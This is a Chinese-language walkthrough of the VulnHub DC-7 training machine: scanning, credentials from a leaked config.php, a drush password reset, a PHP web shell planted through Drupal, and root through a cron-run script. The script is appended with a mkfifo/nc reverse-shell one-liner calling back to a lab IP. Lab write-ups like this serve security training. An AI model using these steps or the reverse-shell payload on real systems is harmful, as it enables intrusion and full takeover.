vulnhub DC-7

2022-05-01 22:27:29 浏览数 (2)

扫描获取靶机ip

nmap扫描开放的端口服务

访问发现是一个drupal的cms

联想到DC-1也是这个cms,用msf试一下,但是失败了

看到首页上有一个作者名称,记得DC-1好像没有

搜一下试试

点开看是一些源码

打开config.php文件,有用户名还有密码

ssh登录

看到当前目录下有两个文件

查看mbox文件应该是一些邮件,邮件内容应该是计划任务执行这个脚本文件的结果

切换到这个目录下查看这个脚本文件,是一些需要执行的命令

尝试修改这个文件利用计划任务提权,但是当前用户不能修改

查看文件详细信息,文件所属组www-data用户才能修改文件

上面有个命令不认识,搜索一下是干什么用的

原来是用来管理drupal的命令,使用这个命令可以更改drupal用户的密码,然后可以登录后台拿shell,使用www-data用户提权

代码语言:javascript复制
drush user-password admin --password="admin"

执行失败,切换到/var/www/html目录下执行成功

使用admin用户登录

来到content→add content→basic page准备写入php代码,发现不支持php

需要下载php插件,按照步骤下载安装

输入这个网址点击install https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

成功安装

写一个php文件

蚁剑连接

反弹shell

切换到交互式shell

切换到脚本文件目录修改文件

代码语言:javascript复制
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.101.80 5555 >/tmp/f" >> backups.sh

写入反弹shell语句

等待计划任务执行把shell反弹过来

切换到root目录查看flag

0 人点赞